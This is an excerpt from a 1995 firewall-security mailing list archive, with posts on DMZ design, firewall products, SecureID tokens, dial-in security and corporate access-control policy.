:--> > ---------------------------------------------------------------------
:--> >
:--> > First design:
:--> >
:--> >             --      DMZ      --
:--> > Internet -->|R1|-------------|R2|----- inside net
:--> >             --    bastion    --
:--> >                    host
:--> >
:--> > ---------------------------------------------------------------------
:--> >
:--> > The second one:
:--> >
:--> >             --
:--> > Internet -->|R1|------- inside net
:--> >             --
:--> >                b.   |
:--> >                host |DMZ
:--> >                     |
:--> >                     -
:-->
:--> One advantage of the first design is that you may need/want to have different
:--> routing policies, in addition to different packet filtering, in R1 than R2.
:--> A disadvantage is that, if the bastion is subverted, it is in the best place
:--> to sniff all your Internet traffic. This is not true of the second design.
:-->
:--> With the second design you will have more than one internal interface,
:--> so preventing source address spoofing will require the screen on incoming
:--> packets, which Cisco (e.g.) software, only supports in more recent versions.
:-->
:--> -- John
:-->
:-->

From firewalls-owner Thu May 4 06:09:47 1995
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: firewalls@greatcircle.com
Date: Thu, 4 May 1995 08:53:25 -0500
Subject: looking for war diallers

Looking for pointers to war diallers for the purpose of enforcing a "no dialin modem" policy.

--
Jim Carroll - jcarroll@wellspring.us.dg.com
... the usual disclaimers ...
## Life is like a boxing chocolate ##

From firewalls-owner Thu May 4 06:46:20 1995
From: David Leonard
To: firewalls@greatcircle.com
Date: Thu, 04 May 1995 08:07:48 -0600
Subject: Researching Firewall Products

I am in the process of researching what type of firewall products are out on the market. I have looked at Sidewinder, Gauntlet and Firewall-1. I am starting to get interested in the functionality and flexibility of Firewall-1. My question is, are there similar products to Firewall-1 on the market and if there are, what are their names and how can I get in touch with them.

Any assistance I can get will be appreciated.

david

From firewalls-owner Thu May 4 06:54:23 1995
From: P.vanMossel@telecom.ptt.nl
To: firewalls@greatcircle.com
Date: Thu, 04 May 1995 10:11:01 +0200
Subject: RE: completely transparent filtering device?
Drawbridge could be useful. See Paul.

From firewalls-owner Thu May 4 07:09:44 1995
From: "S. Alexander Jacobson"
Subject: Re: PC site security
To: Gil Tennant
cc: firewalls@GreatCircle.COM
Date: Thu, 4 May 1995 09:55:31 -29900

NetManage Chameleon packages an FTPd with their Internet client software. I haven't tried doing this with Chameleon but... If your employer is running the FTPd and has private netware drives mounted, then anyone who hacks through the ftpd gets access to those private directories.

-Alex-

_____________________________________________________________________________
S. Alexander Jacobson                          Internet Virtual Office Inc.
alex@virtual.office.com Consulting info@virtual.office.com http://vo.com/people/alex/ ** http://virtual.office.com 1-212-799-2645 voice Technology gopher.virtual.office.com 1-212-799-1075 fax Strategy telephone: 1-800-TODAY-VO From firewalls-owner Thu May 4 07:33:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29361 for firewalls-outgoing; Thu, 4 May 1995 06:21:45 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA29356 for ; Thu, 4 May 1995 06:21:42 -0700 Received: from relay.tis.com by relay1.UU.NET with SMTP id QQyogr06001; Thu, 4 May 1995 09:22:09 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma003373; Thu, 4 May 95 09:20:20 -0400 Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA27340; Thu, 4 May 95 09:21:00 EDT Received: by (4.1/illuminati) id AA02705; Thu, 4 May 95 09:28:07 EDT From: "Marcus J. Ranum" Message-Id: <2705.9505041328@illuminati> Subject: Re: Pentagon security professionals To: fc@all.net (Dr. Frederick B. Cohen) Date: Thu, 4 May 1995 09:28:07 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9505040242.AA04054@all.net> from "Dr. Frederick B. Cohen" at May 3, 95 10:42:01 pm Organization: Trusted Information Systems, Inc. Glenwood, MD Phone: 301-854-6889 Coredump: Infocalypse Now!!! Content-Type: text Content-Length: 508 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dr. Frederick B. Cohen writes: > Please feel free to flame away. No, please don't flame away. The list has enough problems with poor signal to noise ratio without someone *encouraging* flaming. I've noticed a tendency for some discussions on the list to continue interminably, in which one or both parties refuse to forgo getting in the last word. In those cases I am trying (and encourage others to do likewise) to cease engaging in a discussion after a reasonable number of mails back and forth. 
mjr. From firewalls-owner Thu May 4 09:28:17 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02928 for firewalls-outgoing; Thu, 4 May 1995 08:34:48 -0700 Received: from vtserf.cc.vt.edu (vtserf.CC.VT.EDU [128.173.4.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA02921 for ; Thu, 4 May 1995 08:34:42 -0700 From: marchany@vtserf.cc.vt.edu Received: by vtserf.cc.vt.edu (5.65/DEC-Ultrix/4.3) id AA02675; Thu, 4 May 1995 11:35:03 -0400 Message-Id: <9505041535.AA02675@vtserf.cc.vt.edu> To: mark@seismo.CSS.GOV (Mark LeVea), firewalls@greatcircle.com Cc: marchany@vtserf.cc.vt.edu, laxnn@trane.laxbldg17.lax.trane.com Subject: Re: repository of Security policies - CORRECTION In-Reply-To: Your message of "Thu, 04 May 95 06:47:50 EDT." <9505041047.AA17540@mimer.CSS.GOV> Date: Thu, 04 May 95 11:34:57 -0400 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In an earlier note that I posted to the firewalls list, I gave the incorrect address of the security policy repository that is at eff.org. The correct hostname is: ftp.eff.org A good list of acceptable use policies (mostly academic but some commercial) can be found in the /pub/CAF/policies at this site. Sorry for the error, it was a case of my hands outrunning my brain :-). 
-Randy Marchany VA Tech Computing Center Blacksburg, VA 24060

From firewalls-owner Thu May 4 09:34:28 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02878 for firewalls-outgoing; Thu, 4 May 1995 08:31:10 -0700 Received: from lykos.netpart.com (lykos.netpart.com [199.35.49.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02873 for ; Thu, 4 May 1995 08:31:06 -0700 Received: (phil@localhost) by lykos.netpart.com (8.6.9/8.6.5) id IAA29745; Thu, 4 May 1995 08:30:20 -0700 Date: Thu, 4 May 1995 08:30:20 -0700 From: Phil Trubey Message-Id: <199505041530.IAA29745@lykos.netpart.com> To: padgett@tccslr.dnet.mmc.COM Subject: Re: Source Code In-Reply-To: <9505011859.AA04955@uvs1.orl.mmc.com> Organization: NetPartners, Newport Beach, CA Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

In article <9505011859.AA04955@uvs1.orl.mmc.com> you write:
>Frank writes:
>>Even though we include source code with our distribution, I would not suggest
>>that anyone make changes. It gets real hard to try to support a product
>>and changes as well. I can not guarantee that any changes that are
>>made will work in the next version.
>
>This is the best choice IMNSHO. The code is there if necessary (and often is,
>cannot count the times I have had to make a vendor-suggested patch because the
>vendor could not duplicate the problem on their equipment), and available
>for examination (when I have made trouble calls, this has often enabled me
>to direct the vendor's attention to the specific module giving trouble.

There are other ways of providing the same functionality - BorderWare has a user-controllable (i.e. you can turn on and off this feature via the console, by default it is off) back door that allows the developers to effectively telnet into the firewall (which can be initiated only via a certain IP address, and only using strong authentication) over the net and see what's wrong with a firewall.
Patches can be downloaded from the net (patches are cryptographically checksummed, of course) by end users and a console menu selection is used to apply them (the patch update code brings the machine down to a single user, non-network listening mode, applies the patches and reboots). If you need to debug a commercial program on your own, the vendor obviously has a problem with supporting their installed base. I realize that trusting a vendor to have good support policies is always an act of faith, but BorderWare (and other firewall vendors, I might add) have an open user mailing list that users can gripe about bad support to. This provides a tight feedback loop since a lot of prospective customers look at this list... >The point is that in a dynamic environment a customer may not be able to wait >for the next version and at the same time, the vendor may not have the >available resources (equipment and manpower) to be able to recreate it. And with the above described setup, the software manufacturer can debug your particular dynamic set up ("Did you know you had a mail routing loop?") and create patches that are installable and downloaded by everyone which keeps everyone running the same versions. -- Phil Trubey | NetPartners | Providing Internet products and services. 
E-mail: phil@netpart.com | Home Page: http://www.netpart.com/ Phone: 714-759-1641 |

From firewalls-owner Thu May 4 09:39:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03443 for firewalls-outgoing; Thu, 4 May 1995 09:04:18 -0700 Received: from gmlink2.gmeds.com (gmlink2.gmeds.com [192.85.154.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03434 for ; Thu, 4 May 1995 09:04:01 -0700 Received: from wtc.nec.gmeds.com (necns.wtc.nec.gmeds.com) by gmlink2.gmeds.com with SMTP id AA18192 (InterLock SMTP Gateway 3.0 for ); Thu, 4 May 1995 10:13:08 -0400 Received: from glock.wtc.nmc.gmeds.com by wtc.nec.gmeds.com (4.1/EDS-1.0) id AA17528; Thu, 4 May 95 10:12:46 EDT Received: by glock.wtc.nmc.gmeds.com (5.x/SMI-SVR4) id AA19246; Thu, 4 May 1995 10:09:12 -0400 From: atkinsr@glock.wtc.nec.gmeds.com (Rusty Atkins L.) Message-Id: <9505041409.AA19246@glock.wtc.nmc.gmeds.com> Subject: looking for war diallers (fwd) To: firewalls@greatcircle.com (firewalls) Date: Thu, 4 May 1995 10:09:11 -0400 (EDT) Reply-To: atkinsr@glock.wtc.nmc.gmeds.com X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Forwarded message:
>
> Looking for pointers to war diallers for the purpose of enforcing a
> "no dialin modem" policy.
> --

Get the "Hacker Chronicles" CD(s), there are dozens of them there.

-- ---------------------------------------------------------------------------- * Rusty Atkins This EDS/ATSS * * email: atkinsr@glock.wtc.nmc.gmeds.com space Mfg B, MD-44 * * Phone: (810) 947-0220 intentionally 30300 Mound * * Pager: (810) 316-3392 left Warren, MI.
* * Fax: (810) 947-0652 blank 48090 * ---------------------------------------------------------------------------- From firewalls-owner Thu May 4 10:14:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03188 for firewalls-outgoing; Thu, 4 May 1995 08:48:00 -0700 Received: from Polka.Med.Yale.Edu (polka.med.yale.edu [130.132.19.123]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03183 for ; Thu, 4 May 1995 08:47:56 -0700 Received: from beaker.med.yale.edu by Polka.Med.Yale.Edu (PMDF #12135) id <01HQ3RCY748W0000X4@Polka.Med.Yale.Edu>; Thu, 4 May 1995 11:49 EDT Received: from rrr.ynhhlab.yale.edu by beaker.med.yale.edu via SMTP; Thu, 4 May 95 11:45:33 -0400 Date: Thu, 04 May 1995 11:45:21 -0400 From: rodion@beaker.med.yale.edu (R. Rodion Rathbone) Subject: Re: Secure Modem Pool To: firewalls@greatcircle.com Message-id: <9505041545.AA13486@beaker.med.yale.edu> X-Envelope-to: firewalls@greatcircle.com Content-type: text/plain; charset="us-ascii" X-Sender: rodion@beaker.med.yale.edu Mime-Version: 1.0 X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve Waltner wrote: ----stuff cut out---- > What about a product from Security Dynamics and is called SecureID? >This setup sounds like a fairly secure setup to me, but I wanted other >opinions from readers of this mailing list. Joe Pennel responds: >I had a chance to use the SecureID card at a former employer, and was very >impressed. In addition to the features mentioned, I must add that admin >of these things is great, especially if you have remote users. [...] Greg Woods adds: >That's fascinating, because I thought admin of these things was a royal pain >in the butt. For one thing, the ONLY way to set the PIN number requires [...] There was more discussion of SecureID here several months back, and opinion was mixed, some really liking it and others finding it a pain. 
I think the differences were more than just personal taste (in admin menus, etc.). I think they depended on technical sophistication, tolerance, and seriousness of those using the card, and how tight a security barrier the administrator felt he/she needed. Those who really wanted a token based system, and had reasonably good users were happy with it. Another thought Skey was fine, and in some ways preferable. If dial-back or caller-ID is an acceptable solution to you, then you will probably find the overhead of the token system a pain. (Dial-back has a vulnerability unless you use a separate line to call back, one that outsiders don't know the number for, or that blocks incoming calls at the central office.)

I have been one of the less happy users of SecureID, since many of the users are loosely connected to the institution, and variably motivated for security of the data involved. I have gotten cards back with the phone number and PIN number written on a label on the card. They didn't even think to take it off before they gave it to me. My computer section staff would never do this, but a physician outside the institution thinks "it's only for laboratory data, what's the big deal". (Yes, I do give them the security speech when they get the card, and they sign something which is heavily worded, but fundamentally they are not directly part of the institution.) For these users, in this situation, dial-back would be safer, as they could use a password they could remember.

The base unit resynchronizes with each card each time that card is used, that's one reason the PINs have to be unique, to identify the card. If a card is unused for 3 months, it can get far enough out of sync that it can't recover. The drift varies from card to card, of course, and may depend on the condition of the battery. Once a week use will never be a problem. Once a month is probably ok, except for the occasional card that is marginal.

The cards need physical protection.
A shirt pocket is OK, but don't let the credit card size lead you to think it can go in a wallet. It won't survive. The $60 a card, every 3 years, can become significant, but the overhead of buying and issuing new cards may be just as much of a concern. -Rodion Rathbone (I speak for myself, as best I can.) From firewalls-owner Thu May 4 10:15:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03918 for firewalls-outgoing; Thu, 4 May 1995 09:48:35 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA03913 for ; Thu, 4 May 1995 09:48:28 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA07708 for ; Thu, 4 May 1995 11:50:16 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 199590000; 4 May 95 12:48 CDT Received: from sctc.com by sccmailhost.sctc.com id 177210000; 4 May 95 12:47 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id LAA01972; Thu, 4 May 1995 11:47:55 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA07300; Thu, 4 May 1995 11:47:54 -0500 Date: Thu, 4 May 1995 11:47:54 -0500 From: Rick Smith Message-Id: <199505041647.LAA07300@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Access control across a large network - firewall or other system? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sick Puppy writes about a large organization: >For pretty good reasons the users of different subnets don't trust each >other. In particular, some of the programmers of financial systems have >tried to crack accounts of other people on database systems that the financial >programmers are not supposed to use. 
Users on some subnets are paranoid that >the work they are doing might be leaked to the press while users on other >subnets really like the attention they get from the press. As the network >has >grown, some users have installed their own insecure dial-up links to >other networks instead of using the secure corporate links. >... In short, they need a centralized >access control mechanism that blocks unwanted connections. What you're describing is a common situation in which separate entities within a larger organization have very different security requirements. One approach is for the separate groups to take responsibility for their own security. This is difficult in some corporate cultures, however. >I know that the Night Hawk from Harris Corp. can be used to provide this >kind of centralized access control and in fact it is the only box I >have come across that can do this kind of thing. I would like to know >what other alternatives exist. We've built Sidewinder 2.0 to allow multiple networks with differing access controls allowed between them. So you can allow certain proxy flows between the inside networks and other flows between inside and Internet. So far, however, the organizations with Sidewinders haven't needed multiple network connections in practice. There's lots of politics in setting up separate access rules inside an organization. Another alternative is to install separate firewalls on the individual entity networks. The individual net admins can control access to their internal nets, and not allow the net admins to tweak the access controls for other groups' nets. Or else remotely manage the firewalls from a central site. Rick. 
smith@sctc.com roseville, minnesota From firewalls-owner Thu May 4 11:18:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04615 for firewalls-outgoing; Thu, 4 May 1995 10:23:46 -0700 Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04602 for ; Thu, 4 May 1995 10:23:39 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id NAA11130 for ; Thu, 4 May 1995 13:32:45 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma011128; Thu May 4 13:32:35 1995 Received: from metis.milkyway.com (root@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id NAA02548 for ; Thu, 4 May 1995 13:28:06 -0400 Received: from metis.milkyway.com by metis.milkyway.com (8.6.9/BSDI-Client) id NAA00603; Thu, 4 May 1995 13:33:57 -0400 Message-Id: <199505041733.NAA00603@metis.milkyway.com> x-mailer: exmh version 1.6delta 4/7/95 x-uri: http://www.milkyway.com/People/Michael_Richardson/Bio.html to: firewalls@greatcircle.com subject: Re: Firewall failure modes (was Re: performance) references: <9504251648.AA07530@brittany.oes.amdahl.com> <3631.9504260648@illuminati> mime-version: 1.0 content-type: application/pgp; format=mime; x-action=signclear; x-originator=21723369 content-transfer-encoding: 7bit Date: Thu, 04 May 1995 13:33:56 -0400 From: Michael Richardson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- content-type: text/plain; charset=us-ascii In article <3631.9504260648@illuminati>, Marcus J. Ranum wrote: > 4) /lockdown is owned by root and is unwriteable There is one time when /lockdown needs to be made writable, alas. When the customer and/or tester says "something just stopped", and the logs say SEGV, and you want that core dump. 
We make "/lockdown" a separate partition, and made it just big enough to take two typically sized core dumps :-) +w only on request though.

> Therefore, I'm content to assume that an attacker is
>going to have a lot of trouble getting privs for that process,
>since there's nothing setuid and no devices. Processes that

The one thing that I can think that an attacker might want to do, assuming some kind of fingerd-like hole is that they will write code to do a connect(2) call, and forget compromising the entire firewall.

> Now, I did not go review the kernel code that implements
>setuid() chroot() and so on. That's for the trusted systems guys
>and you can see the impact that trusted system style assurance
>has on your product schedules.

I have examined the code a bit. I hadn't noticed fchroot() existed on SunOS until about a month ago. It says that it only guarantees that it will chroot(2) back to the real root.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAgUBL6kQAhUFVvYhcjNpAQHvhgH+OUtA0SFhFotOkD5Mal2XHY6ZdMqb5ppC
g2rTYAShcVs1wDhxX7hAIdpu+ESSCgQ7/UoMwVby3sEcsx41adE5XA==
=YV4Y
-----END PGP SIGNATURE-----

From firewalls-owner Thu May 4 11:29:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04544 for firewalls-outgoing; Thu, 4 May 1995 10:21:46 -0700 Received: from outside.mediavis.com (mediavis.com [204.30.229.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04539 for ; Thu, 4 May 1995 10:21:43 -0700 Received: from MediaVis.com by outside.mediavis.com with smtp (Smail3.1.28.1 #64) id m0s74ab-000U1hC; Thu, 4 May 95 10:21 PDT Received: from mvimail.mediavis.com by MediaVis.com (Media Vision, Inc.) with SMTP (1.37.109.4/16.2) id AA20974; Thu, 4 May 95 10:15:26 -0700 (Send to firstname_lastname@MediaVis.com) Received: by MVIMAIL.MEDIAVIS.COM with Microsoft Mail id <2FA90C66@MVIMAIL.MEDIAVIS.COM>; Thu, 04 May 95 10:18:30 PDT From: Alan Millar To: firewalls-digest Subject: Re: Help with begining options?
Date: Wed, 03 May 95 16:41:00 PDT Message-Id: <2FA90C66@MVIMAIL.MEDIAVIS.COM> Encoding: 47 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fred writes: > 1. If you won't get money for it, don't do it. Security is too important. > You need to establish that there is a business requirement for your > company to connect up to the Internet. THen you need to establish what > the risks are. The cost model should show that it is worth spending money > to protect your assets or it will show that you don't need an Internet > connection enough to justify the cost. The middle ground of "scrimping" > does not belong in the equation. I agree completely that security must not be compromised because of money, and that the connection must be driven by a business need and cost justification. By extension, though, there is more than one way to construct a firewall/Internet connection, and there is more than one type of cost to quantify. You may be in a situation where your manpower is "free" or is a lesser factor because it is already budgeted/committed, but cash for capital acquisitions is tight. In this situation, you can still set up a secure firewall with little cash outlay. It will correspondingly take much more of your time and effort, and you still only do it after you evaluate the risks and business requirements. The term "scrimping" has a connotation of piecing something less-than-adequate together. I consider that different from creating a low-cost solution that fulfills all requirements. The difference is in knowing what your requirements and costs are. Don't scrimp. For example, your requirements could call for e-mail and news for internal users, and FTP and Web services to the public. One not-very-sexy but valid solution for this could be UUCP plus an outsourced FTP and Web site. Low cost and quite secure, relatively speaking; it just depends on your real needs. Remember to differentiate between your needs and your wants. 
Assuming the IP connection approach, you can construct a proxy bastion for little cash using one of the freely-available Intel Unix versions (NetBSD, Linux, etc) plus the TIS toolkit. You can lock this down plenty tight enough to be Satan-proof :-) and still allow your users the free run of the Web. All of this depends on having a plan and list of requirements first. Plan to spend a lot of time doing your homework. - Alan Millar Computer Network/Operations Manager Media Vision, Inc. AMillar@MediaVis.com From firewalls-owner Thu May 4 12:04:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04685 for firewalls-outgoing; Thu, 4 May 1995 10:27:07 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04680 for ; Thu, 4 May 1995 10:27:04 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id MAA07993 for ; Thu, 4 May 1995 12:29:27 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 202860000; 4 May 95 13:27 CDT Received: from sctc.com by sccmailhost.sctc.com id 180110000; 4 May 95 13:27 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id MAA04958; Thu, 4 May 1995 12:27:24 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id MAA08365; Thu, 4 May 1995 12:27:22 -0500 Date: Thu, 4 May 1995 12:27:22 -0500 From: Rick Smith Message-Id: <199505041727.MAA08365@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Access control across a large network - firewall or other system? 
Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Paul Ferguson said the following about handling an organization with a variety of levels of trust among its users:

>If a centralized access control mechanism is needed in a scenario
>such as this, centralized network management is the key. You
>simply toss effectiveness to the four winds when you allow autonomous
>management of the same IP address space. The onus is on corporate
>network management to dictate policy.

Can corporate network management actually dictate a policy and make it stick? Once upon a time, MIS departments dictated that all computers would be bought through them. Then along came minis and micros. Today, almost anyone can implement a LAN by visiting the local PC mart. If a system is within a department's budget and it visibly contributes to the corporation's success, no policy is going to unplug it. If dialins or Web pages make them seriously more successful, corporate network management won't be able to do a thing, even if it violates policy.

Data security is built (or skewered) on three prongs: mission, threats, and countermeasures. The organization of interest has a "mission" like "build widgets" and its information resources are subject to a variety of threats. As you pile on countermeasures you reduce the threats, often at the expense of the organization's primary mission. At some point security countermeasures are too expensive relative to the level of threat or they too seriously degrade the primary mission. In practice, security provides deterrence.

>Otherwise, it's every man for himself, to coin a phrase. Certainly
>access-control, and route propagation, can be controlled rather
>effectively from a fringe-point on a large corporate network, in the
>right hands.

Corporate network policy has to at least identify the separate groups of players within the organization in terms of mission and the threats they need to deal with.
While some groups "build widgets" other groups "sell widgets." Those who sell will need different information services than those who build, and have information of different sensitivity. It may be necessary to break the corporation into separate subnets. Typically we see this with the "main office" and the "subsidiaries" or "subcontractors" or "independent agents." On the other hand, if fellow employees are hacking one another, the corporation has problems that no amount of INFOSEC technology is ever going to fix. They need to fix the real problem. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Thu May 4 12:10:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04919 for firewalls-outgoing; Thu, 4 May 1995 10:37:57 -0700 Received: from ren.stanford.edu (Ren.Stanford.EDU [36.47.0.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04914 for ; Thu, 4 May 1995 10:37:55 -0700 Received: from MR.STANFORD.EDU by REN.STANFORD.EDU (PMDF #3651 ) id <01HQ3OTIQWU0000VD1@REN.STANFORD.EDU>; Thu, 4 May 1995 10:36:05 PDT Received: with PMDF-MR; Thu, 4 May 1995 18:36:00 PDT Date: 04 May 1995 10:31:34 -0700 (PDT) From: Connie Sadler Subject: Re: Secure Modem Pools To: firewalls@greatcircle.com Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Posting-date: 04 May 1995 10:35:00 -0700 (PDT) Importance: normal Priority: non-urgent Sensitivity: Company-Confidential UA-content-id: B202ZVTAF4HM4 X-Hop-count: 1 A1-type: MAIL Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Related to the discussion on Security Dynamics, has anyone got experience with CDI's Remote Dial-in Applications? Secure dialup *over* the firewall is a big issue to us right now. CDI claims to be coming out very soon with a system that uses an ordinary pager as a token for authentication. Our physicians like this idea because they already have pagers and don't want to carry a token. 
Has anybody heard about this who knows how it will work? Thanks. Connie From firewalls-owner Thu May 4 13:07:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06491 for firewalls-outgoing; Thu, 4 May 1995 11:46:42 -0700 Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06486 for ; Thu, 4 May 1995 11:46:39 -0700 Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id LAA04272; Thu, 4 May 1995 11:40:16 -0700 Received: from abulafia.genmagic.com by genmagic.genmagic.com (4.1/SMI-4.1/JBS) id AA06025; Thu, 4 May 95 11:40:16 PDT Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:firewalls@GreatCircle.COM id AA01810; Thu, 4 May 95 11:50:40 -0700 Date: Thu, 4 May 95 11:50:40 -0700 From: jet@abulafia.genmagic.com (J. Eric Townsend) Message-Id: <9505041850.AA01810@abulafia.genmagic.com> To: jcarroll@wellspring.us.dg.com Cc: firewalls@GreatCircle.COM Subject: a different solution to (re: looking for war diallers In-Reply-To: <9505041253.AA15788@wellspring.us.dg.com> References: <9505041253.AA15788@wellspring.us.dg.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "jcarroll" == Jim Carroll writes: jcarroll> Looking for pointers to war diallers for the purpose of enforcing a jcarroll> "no dialin modem" policy. Our PBX-meister made the default "no external DID" for all our analog lines. To get an external DID requires a note from a VP *and* the security dweeb. 
From firewalls-owner Thu May 4 13:12:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06108 for firewalls-outgoing; Thu, 4 May 1995 11:26:14 -0700 Received: from GOOD.CCCCD.EDU (good.ccccd.edu [192.231.40.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06099 for ; Thu, 4 May 1995 11:26:11 -0700 From: ZSJABBOTT@EXPRESS.CCCCD.EDU Received: from EXPRESS.CCCCD.EDU by EXPRESS.CCCCD.EDU (PMDF V4.2-12 #3064) id <01HQ3UXDWODC91VTP7@EXPRESS.CCCCD.EDU>; Thu, 4 May 1995 13:32:13 CST Date: Thu, 04 May 1995 13:32:13 -0600 (CST) Subject: Message from China To: firewalls@greatcircle.com Message-id: <01HQ3UXDXHB691VTP7@EXPRESS.CCCCD.EDU> X-VMS-To: IN%"firewalls@greatcircle.com" MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is the message from China concerning ZHU Ling's sickness a valid message? I received the message via the firewall's listserv. Jessie M. Abbott-White Collin County Community College ZSJABBOTT@EXPRESS.CCCCD.EDU Computer Services ZSJABBOTT@GOOD.CCCCD.EDU 2200 West University 214-548-6646 McKinney, Tx. 75069-8001 From firewalls-owner Thu May 4 13:16:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06063 for firewalls-outgoing; Thu, 4 May 1995 11:23:45 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA06058; Thu, 4 May 1995 11:23:41 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 4 May 1995 11:24:18 -0800 To: fc@all.net (Dr. Frederick B. Cohen), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Pentagon security professionals Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:42 PM 5/3/95, Dr. Frederick B. 
Cohen wrote:
> Please feel free to flame away.

But not on this list. Flames are not welcome here. If anyone wants to toast
Dr. Cohen by private email, be his guest per the invitation above, but don't
Cc: Firewalls.

-Brent

----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule of
upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                                  Great Circle Associates
Brent@GreatCircle.COM                          1057 West Dana Street
+1 415 962 0841                                Mountain View, CA 94041

From firewalls-owner Thu May 4 13:55:27 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08115 for firewalls-outgoing; Thu, 4 May 1995 13:10:33 -0700
Received: from VNET.IBM.COM (vnet.ibm.com [199.171.26.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA08110 for ; Thu, 4 May 1995 13:10:31 -0700
From: tparette@VNET.IBM.COM
